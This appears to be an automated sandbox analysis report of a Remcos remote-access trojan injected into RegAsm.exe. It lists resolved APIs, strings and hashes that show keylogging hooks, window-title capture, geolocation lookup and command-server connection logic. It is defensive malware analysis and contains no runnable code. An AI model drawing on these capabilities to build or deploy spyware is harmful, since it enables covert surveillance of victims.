API calls 49271->49274 49272 41b415 InternetCloseHandle InternetCloseHandle 49273 41b427 49272->49273 49273->49252 49274->49270 49274->49271 49274->49272 49275 401fd8 11 API calls 49274->49275 49275->49274 49276->49256 49277 426c4b 49282 426cc8 send 49277->49282 49283 44831e 49291 448710 49283->49291 49286 448332 49288 44833a 49289 448347 49288->49289 49299 44834a 11 API calls 49288->49299 49292 4484ca _Atexit 5 API calls 
49291->49292 49293 448737 49292->49293 49294 44874f TlsAlloc 49293->49294 49295 448740 49293->49295 49294->49295 49296 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 49295->49296 49297 448328 49296->49297 49297->49286 49298 448299 20 API calls 3 library calls 49297->49298 49298->49288 49299->49286 49300 43be58 49302 43be64 _swprintf ___DestructExceptionObject 49300->49302 49301 43be72 49316 4405dd 20 API calls _Atexit 49301->49316 49302->49301 49304 43be9c 49302->49304 49311 445888 EnterCriticalSection 49304->49311 49306 43be77 ___DestructExceptionObject _Atexit 49307 43bea7 49312 43bf48 49307->49312 49311->49307 49313 43bf56 49312->49313 49315 43beb2 49313->49315 49318 44976c 37 API calls 2 library calls 49313->49318 49317 43becf LeaveCriticalSection std::_Lockit::~_Lockit 49315->49317 49316->49306 49317->49306 49318->49313 49319 41dfbd 49320 41dfd2 _Yarn ___scrt_fastfail 49319->49320 49332 41e1d5 49320->49332 49338 432ec4 21 API calls new 49320->49338 49323 41e1e6 49324 41e189 49323->49324 49334 432ec4 21 API calls new 49323->49334 49326 41e182 ___scrt_fastfail 49326->49324 49339 432ec4 21 API calls new 49326->49339 49328 41e21f ___scrt_fastfail 49328->49324 49335 43354a 49328->49335 49330 41e1af ___scrt_fastfail 49330->49324 49340 432ec4 21 API calls new 49330->49340 49332->49324 49333 41db62 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 49332->49333 49333->49323 49334->49328 49341 433469 49335->49341 49337 433552 49337->49324 49338->49326 49339->49330 49340->49332 49342 433482 49341->49342 49343 433478 49341->49343 49342->49343 49347 432ec4 21 API calls new 49342->49347 49343->49337 49345 4334a3 49345->49343 49348 433837 CryptAcquireContextA 49345->49348 49347->49345 49349 433858 CryptGenRandom 49348->49349 49350 433853 49348->49350 49349->49350 49351 43386d CryptReleaseContext 49349->49351 49350->49343 49351->49350 49352 40165e 49353 401666 49352->49353 49355 401669 49352->49355 49354 4016a8 49356 
4344ea new 22 API calls 49354->49356 49355->49354 49357 401696 49355->49357 49358 40169c 49356->49358 49359 4344ea new 22 API calls 49357->49359 49359->49358 49360 426bdc 49366 426cb1 recv 49360->49366 49367 42f8ed 49368 42f8f8 49367->49368 49369 42f90c 49368->49369 49371 432eee 49368->49371 49372 432ef9 49371->49372 49373 432efd 49371->49373 49372->49369 49375 440f0d 49373->49375 49376 446185 49375->49376 49377 446192 49376->49377 49378 44619d 49376->49378 49380 446137 ___crtLCMapStringA 21 API calls 49377->49380 49379 4461a5 49378->49379 49386 4461ae ___crtLCMapStringA 49378->49386 49388 446782 20 API calls _free 49379->49388 49384 44619a 49380->49384 49382 4461b3 49389 4405dd 20 API calls _Atexit 49382->49389 49383 4461d8 RtlReAllocateHeap 49383->49384 49383->49386 49384->49372 49386->49382 49386->49383 49390 442f80 7 API calls 2 library calls 49386->49390 49388->49384 49389->49384 49390->49386

                    Control-flow Graph

                    APIs
                    • LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                    • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                    • LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                    • LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                    • LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                    • LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                    • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                    • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC86
                    • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC97
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC9A
                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCAA
                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCBA
                    • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCCC
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCCF
                    • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCDC
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCDF
                    • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCF3
                    • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD07
                    • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD19
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD1C
                    • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD29
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD2C
                    • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD39
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD3C
                    • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD49
                    • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD4C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad$HandleModule
                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                    • API String ID: 4236061018-3687161714
                    • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                    • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                    • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                    • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

                    Control-flow Graph

                    APIs
                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                    • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                    • GetLastError.KERNEL32 ref: 0040A2ED
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    • GetMessageA.USER32 ref: 0040A33B
                    • TranslateMessage.USER32(?), ref: 0040A34A
                    • DispatchMessageA.USER32 ref: 0040A355
                    Strings
                    • Keylogger initialization failure: error , xrefs: 0040A301
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                    • String ID: Keylogger initialization failure: error
                    • API String ID: 3219506041-952744263
                    • Opcode ID: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
                    • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                    • Opcode Fuzzy Hash: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
                    • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA

                    Control-flow Graph

                    APIs
                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                    • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                    • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                    Strings
                    • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleOpen$FileRead
                    • String ID: http://geoplugin.net/json.gp
                    • API String ID: 3121278467-91888290
                    • Opcode ID: a69ade3d4837a55be9fd6a93abde095b6ea90823e789e142765cb78eb82537c4
                    • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                    • Opcode Fuzzy Hash: a69ade3d4837a55be9fd6a93abde095b6ea90823e789e142765cb78eb82537c4
                    • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                      • Part of subcall function 00413549: RegQueryValueExA.KERNEL32 ref: 00413587
                      • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
                    • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                    • ExitProcess.KERNEL32 ref: 0040F8CA
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseExitOpenProcessQuerySleepValue
                    • String ID: 4.9.4 Pro$override$pth_unenc
                    • API String ID: 2281282204-930821335
                    • Opcode ID: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                    • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                    • Opcode Fuzzy Hash: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                    • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                    APIs
                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00509650), ref: 00433849
                    • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Crypt$Context$AcquireRandomRelease
                    • String ID:
                    • API String ID: 1815803762-0
                    • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                    • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                    • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                    • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                    Strings
                    • GetSystemTimePreciseAsFileTime, xrefs: 00448972
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$FileSystem
                    • String ID: GetSystemTimePreciseAsFileTime
                    • API String ID: 2086374402-595813830
                    • Opcode ID: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                    • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                    • Opcode Fuzzy Hash: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                    • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                    APIs
                    • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                    • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                    • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                    • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32 ref: 00434B4C
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                    • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                    • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                    • Instruction Fuzzy Hash:

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E9EE
                      • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                    • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                    • API String ID: 2830904901-3701325316
                    • Opcode ID: 898fc42a08711b1fc07b96e79a6387ecb524032f91657ecf64c21f014e13491f
                    • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                    • Opcode Fuzzy Hash: 898fc42a08711b1fc07b96e79a6387ecb524032f91657ecf64c21f014e13491f
                    • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

                    Control-flow Graph

                    APIs
                    • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                    • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                    • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$ErrorLastLocalTime
                    • String ID: | $%I64u$4.9.4 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                    • API String ID: 524882891-108984374
                    • Opcode ID: 81c5a98812ea8a0caa0e97c4631378a6ab0cc3ec579a2ca142f0814394a5abfa
                    • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                    • Opcode Fuzzy Hash: 81c5a98812ea8a0caa0e97c4631378a6ab0cc3ec579a2ca142f0814394a5abfa
                    • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D

                    Control-flow Graph

                    APIs
                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                    • LoadLibraryA.KERNEL32(?), ref: 00414E17
                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                    • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                    • LoadLibraryA.KERNEL32(?), ref: 00414E76
                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                    • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                    • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Library$AddressFreeProc$Load$DirectorySystem
                    • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo

                    APIs
                    • Sleep.KERNEL32(00001388), ref: 0040A740
                      • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                      • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                      • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                      • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                    • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040A81E
                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                    • String ID: 8SG$8SG$pQG$pQG$PG$PG

                    APIs
                    • connect.WS2_32(?,?,?), ref: 004048E0
                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                    • WSAGetLastError.WS2_32 ref: 00404A21
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                    • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |

                    APIs
                    • __Init_thread_footer.LIBCMT ref: 0040AD38
                    • Sleep.KERNEL32(000001F4), ref: 0040AD43
                    • GetForegroundWindow.USER32 ref: 0040AD49
                    • GetWindowTextLengthW.USER32 ref: 0040AD52
                    • GetWindowTextW.USER32 ref: 0040AD86
                    • Sleep.KERNEL32(000003E8), ref: 0040AE54
                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                    • String ID: [${ User has been idle for $ minutes }$]

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: LongNamePath
                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32

                    APIs
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                    • __alloca_probe_16.LIBCMT ref: 0044ACDB
